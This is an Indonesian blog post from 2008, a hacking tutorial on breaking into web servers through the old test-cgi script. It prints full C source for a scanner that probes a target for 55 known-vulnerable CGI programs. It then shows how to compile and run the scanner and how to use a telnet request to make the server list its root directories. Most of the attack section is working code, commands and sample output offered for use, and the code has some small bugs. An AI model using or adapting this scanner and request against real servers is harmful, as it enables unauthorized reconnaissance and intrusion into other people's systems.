Menjebol apache web server melalui test-cgi

Langsung saja, pertama yg perlu dipersiapkan oleh kita adalah scanner untuk melihat vulnerability dari web tersebut, disini saya sertakan juga source programnya, dalam C.

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#define RMT_PORT 80
#define OXO 1
#define LOOK "200 OK" /* ALL PROBLES HAVE A SOLUTION

*/
#define OUT_FILE "DOuiD.cgi" /* The out-put file with the result */

main(int argc, char *argv[])
{

struct sockaddr_in rmt_host;
struct hostent *rh;

FILE *f;
char buffer1[BUFSIZ];
char buffer2[BUFSIZ];
char *cgi[100]; /* You Can Change It Of Course */
char *name[100]; /* Here Also */

int sock,i=1;

memset(cgi,0,100);
memset(name,0,100);

memset(buffer1,0,BUFSIZ);
memset(buffer2,0,BUFSIZ);

/* THe CGI's List /cgi-bin/*.* */

cgi[1] = "GET /cgi-bin/phf SH \n\n";
cgi[2] = "GET /cgi-bin/test-cgi SH \n\n";
cgi[3] = "GET /cgi-bin/nph-test-cgi SH \n\n";
cgi[4] = "GET /cgi-bin/whois_raw.cgi SH \n\n";
cgi[5] = "GET /cgi-bin/Count.cgi SH \n\n";
cgi[6] = "GET /cgi-bin/search/tidfinder.cgi SH \n\n";
cgi[7] = "GET /cgi-bin/finger SH \n\n";
cgi[8] = "GET /cgi-bin/tablebuild.pl SH \n\n";
cgi[9] = "GET /cgi-bin/displayTC.pl SH \n\n";
cgi[10] = "GET /cgi-bin/uptime SH \n\n";
cgi[11] = "GET /cgi-bin/cvsweb/src/usr.bin/rdist/expand.c SH \n\n";
cgi[12] = "GET /cgi-bin/c_download.cgi SH \n\n";
cgi[13] = "GET /cgi-bin/program.pl SH \n\n";
cgi[14] = "GET /cgi-bin/ntitar.pl SH \n\n";
cgi[15] = "GET /cgi-bin/enter.cgi SH \n\n";
cgi[15] = "GET /cgi-bin/query_string.cgi SH \n\n";
cgi[16] = "GET /cgi-bin/AT-generate.cgi SH \n\n";
cgi[17] = "GET /cgi-bin/test.html SH \n\n";
cgi[18] = "GET /cgi-bin/test-unix.html SH \n\n";
cgi[19] = "GET /cgi-bin/printenv SH \n\n";
cgi[20] = "GET /cgi-bin/dasp/fm_shell.asp SH \n\n";
cgi[21] = "GET /cgi-bin/wa SH \n\n";
cgi[22] = "GET /cgi-bin/visadmin.exe SH \n\n";
cgi[23] = "GET /cgi-bin/wguest.exe SH \n\n";
cgi[24] = "GET /cgi-bin/rguest.exe SH \n\n";
cgi[25] = "GET /cgi-bin/AnyForm2 SH \n\n";
cgi[26] = "GET /cgi-dos/args.bat SH \n\n";
cgi[27] = "GET /cgi-bin/perlshop.cgi SH \n\n";
cgi[28] = "GET /cgi-bin/edit.pl SH \n\n";
cgi[29] = "GET /cgi-bin/guestbook.cgi SH \n\n";
cgi[30] = "GET /cgi-bin/cgiwrap SH \n\n";
cgi[31] = "GET /cgi-bin/wrap SH \n\n";
cgi[32] = "GET /cgi-bin/environ.cgi SH \n\n";
cgi[33] = "GET /cgi-bin/classifieds.cgi SH \n\n";
cgi[34] = "GET /cgi-bin/textcounter.pl SH \n\n";
cgi[35] = "GET /cgi-win/uploader.exe SH \n\n";
cgi[36] = "GET /cgi-bin/nph-publish SH \n\n";
cgi[37] = "GET /cgi-bin/handler SH \n\n";
cgi[38] = "GET /cgi-bin/faxsurvey SH \n\n";
cgi[39] = "GET /cgi-bin/php.cgi SH \n\n";
cgi[40] = "GET /cgi-bin/wwwboard.pl SH \n\n";
cgi[41] = "GET /cgi-bin/websendmail SH \n\n";
cgi[42] = "GET /cgi-bin/rwwwshell.pl SH \n\n";
cgi[43] = "GET /cgi-bin/campas SH \n\n";
cgi[44] = "GET /cgi-bin/webdist.cgi SH \n\n";
cgi[45] = "GET /cgi-bin/aglimpse SH \n\n";
cgi[46] = "GET /cgi-bin/man.sh SH \n\n";
cgi[47] = "GET /cgi-bin/info2www SH \n\n";
cgi[48] = "GET /cgi-bin/jj SH \n\n";
cgi[49] = "GET /cgi-bin/files.pl SH \n\n";
cgi[50] = "GET /cgi-bin/maillist.pl SH \n\n";
cgi[51] = "GET /cgi-bin/filemail.pl SH \n\n";
cgi[52] = "GET /cgi-bin/bnbform.cgi SH \n\n";
cgi[53] = "GET /cgi-bin/survey.cgi SH \n\n";
cgi[54] = "GET /cgi-bin/glimpse SH \n\n";
cgi[55] = "GET /cgi-bin/www-sql SH \n\n";

/* CGi Description */

name[1] = "phf ";
name[2] = "test-cgi ";
name[3] = "nph-test-cgi ";
name[4] = "whois_raw.cgi ";
name[5] = "Count.cgi ";
name[6] = "tidfinder.cgi ";
name[7] = "finger ";
name[8] = "tablebuild.pl ";
name[9] = "displayTC.pl ";
name[10] = "uptime ";
name[11] = "expand.c ";
name[12] = "c_download.cgi ";
name[13] = "program.pl ";
name[14] = "ntitar.pl ";
name[15] = "enter.cgi ";
name[16] = "query_tring.cgi ";
name[17] = "test.html ";
name[18] = "test-unix.html ";
name[19] = "printenv ";
name[20] = "fm_shell.asp ";
name[21] = "wa ";
name[22] = "visadmin.exe ";
name[23] = "wguest.exe ";
name[24] = "rguest.exe ";
name[25] = "AnyForm2 ";
name[26] = "args.bat ";
name[27] = "perlshop.cgi ";
name[28] = "edit.pl ";
name[29] = "guestbook ";
name[30] = "cgiwrap ";
name[31] = "wrap ";
name[32] = "environ.cgi ";
name[33] = "classifieds.cgi ";
name[34] = "textcounter.pl ";
name[35] = "uploader.exe ";
name[36] = "nph-publish ";
name[37] = "handler ";
name[38] = "faxsurvey ";
name[39] = "php.cgi ";
name[40] = "wwwboard.pl ";
name[41] = "websendmail ";
name[42] = "rwwwshwll ";
name[43] = "campas ";
name[44] = "webdist.cgi ";
name[45] = "aglimpse ";
name[46] = "man.sh ";
name[47] = "info2www ";
name[48] = "jj ";
name[49] = "files.pl ";
name[50] = "maillist.pl ";
name[51] = "filemail.pl ";
name[52] = "bnbform.cgi ";
name[53] = "survey.cgi ";
name[54] = "slinpse ";
name[55] = "www-sql ";

if ((f=fopen(OUT_FILE,"a"))==NULL){
perror("fopen");
exit(OXO);
}

if (argc != 2){
fprintf(stderr,"Usage: %s \ncgiS.c By ZinC_Sh(C).\n",argv[0]);
exit(OXO);
}

if ((rh=gethostbyname(argv[1])) == NULL){
perror("gethostbyname");
exit(OXO);
}

printf("\t\t\t\b\b------------------------\n");
printf("\t\t\t\b\b|\033[6;35m CGi Scaner V1.0.1 .- \033[0m|\n");
printf("\t\t\t\b\b|\033[6;35m By Scorpionbugs(C).- \033[0m|\n");
printf("\t\t\t\b\b------------------------\n\n");

while (i < 55)
{
if((sock=socket(AF_INET,SOCK_STREAM,0)) == -1){
perror("Socket");
exit(OXO);
}

bzero(&(rmt_host.sin_zero),8);
rmt_host.sin_family = AF_INET;
rmt_host.sin_addr = *((struct in_addr *)rh->h_addr);
rmt_host.sin_port = htons(RMT_PORT);

if (connect(sock,(struct sockaddr *) &rmt_host ,sizeof(rmt_host)) != 0){
perror("connect");
exit(OXO);
}

printf("LookinG For %s\b\b\b\bCGI in /cgi-bin/ :",name[i]);

send(sock,cgi[i],sizeof(cgi),0);
recv(sock,buffer1,sizeof(buffer1),0);

if((strstr(buffer1,LOOK)) != 0){
printf("\t\033[1;32mCGI FounD !!!\033[0m\n");
fputs("FounD !!!",f);
fputs(cgi[i],f);
} else {
printf("\tCGI NoT FounD.\n");
}

close(sock);
i++;
}

printf("\nKapUt !\nMay The Poula KApribekou Be With You... (ZinC_Sh).\n");
printf("The Results Will Be Found In THe DOuiD.cgi File.\n");

fclose(f);
return 0;
}

cara compile : gcc cgis.c -o cgis

kalo udah di compile trus sekarang waktunya hack dengan syntak

#cgis 10.1.xx.xx
looking for phf CGI in /cgi-bin/ : CGI Not Found
looking for test-cgi CGI in /cgi-bin/ : CGI Found !!!!
bla bla bla
bla bla
bla

dan hasil scannya disimpan di file DOuiD.cgi, di file ini sih cuma ngasih tahu aja hasil proses scan tersebut
nah dibaris kedua kita bisa lihat ternyata cgi-bin/test-cgi ada dan open dalam web tersebut

selanjutnya tinggal kita telnet ke 10.1.xx.xx melalui port 80

#telnet 10.1.xx.xx 80
Trying 10.1.xx.xx
Connected to 10.1.xx.xx Escape character is '^}'
GET /cgin-bin/test-cgi?/* report:argc is 1. argv is /\*. SERVER_SOFTWARE = NCSA/1.4.1 SERVER_NAME = removed.name.com GATEWAY_INTERFACE = CGI/1.1 SERVER_PROTOCOL = HTTP/0.9 SERVER_PORT = 80 REQUEST_METHOD = GET HTTP_ACCEPT = PATH_INFO = PATH_TRANSLATED = SCRIPT_NAME = /bin/cgi-bin/test-cgi QUERY_STRING = /a /bin /boot /bsd /cdrom /dev /etc /home /lib /mnt /root
/sbin /stand /sys /tmp /usr /usr2 /var
REMOTE_HOST = remote.machine.com
REMOTE_ADDR = 255.255.255.255
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE =
CONTENT_LENGTH =

nah di query_string kita bisa lihat seluruh directory selanjutnya terserah anda, saya menyarankan jangan mengubah atau menggangu
isi directory tersebut. selamat mencoba

Indahnya Berbagi

Friday, October 17, 2008

Menjebol apache web server melalui test-cgi

0 comments em “Menjebol apache web server melalui test-cgi”

Post a Comment

About Me

Blogroll

Blogger news

Buku Tamu

Popular Posts

Categories

Blog Archive

Total Pageviews

Followers

About